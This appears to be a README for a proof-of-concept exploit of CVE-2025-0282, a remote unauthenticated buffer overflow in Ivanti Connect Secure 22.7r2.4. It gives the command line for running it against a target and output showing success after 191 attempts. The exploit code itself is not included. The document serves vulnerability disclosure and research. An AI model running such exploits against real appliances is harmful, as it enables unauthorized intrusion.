A remote unauthenticated stack based buffer overflow affecting Ivanti Connect Secure, Ivanti Policy Secure, and Ivanti Neurons for ZTA gateways
This is a proof of concept exploit to demonstrate exploitation of CVE-2025-0282, and is based upon the exploitation strategy published by watchTowr.
This PoC has a ROP chain built to target Ivanti Connect Secure 22.7r2.4. No other version can be targeted without first building the corresponding ROP chain for that target version.
This PoC has a payload that will execute an operating system command to create a temporary file on the target system. This is how you know the exploit has succeeded. Code execution is achieved with the privileges of the non root user nr.
We can run this script against a vulnerable Ivanti Connect Secure target, version 22.7r2.4 as follows:
C:\Users\sfewer\Desktop\CVE-2025-0282>ruby CVE-2025-0282.rb -t 192.168.86.111 -p 443
[+] Targeting 192.168.86.111:443
[+] Detected version 22.7.2.3597
[2025-01-16 14:39:56 +0000] Starting...
[2025-01-16 14:39:56 +0000] Triggering #1...
[2025-01-16 14:39:57 +0000] Triggering #2...
[2025-01-16 14:40:08 +0000] Triggering #3...
[2025-01-16 14:40:19 +0000] Triggering #4...
[2025-01-16 14:40:30 +0000] Triggering #5...
...snip...
[2025-01-16 15:13:28 +0000] Triggering #188...
[2025-01-16 15:13:38 +0000] Triggering #189...
[2025-01-16 15:13:49 +0000] Triggering #190...
[2025-01-16 15:14:00 +0000] Triggering #191...If the exploit succeeds, it will write a new file to the temp directory /var/tmp/, with a number value corresponding to the exploit attempt iteration as part of the file name.
In a separate root shell on the target device (which we established by jail breaking the appliance), we can observe when the exploit has succeeded:
bash-4.2# ls -al /var/tmp/hax*
ls -al /var/tmp/hax*
ls: cannot access /var/tmp/hax*: No such file or directory
bash-4.2# ls -al /var/tmp/hax*
ls -al /var/tmp/hax*
-rw-r--r-- 1 nr nr 0 Jan 16 07:10 /var/tmp/haxor_191
bash-4.2#We can see from this example, that the exploit made 190 failed attempts, and was successful on the 191th attempt. So in this example, exploitation of this target succeeded in 34 minutes.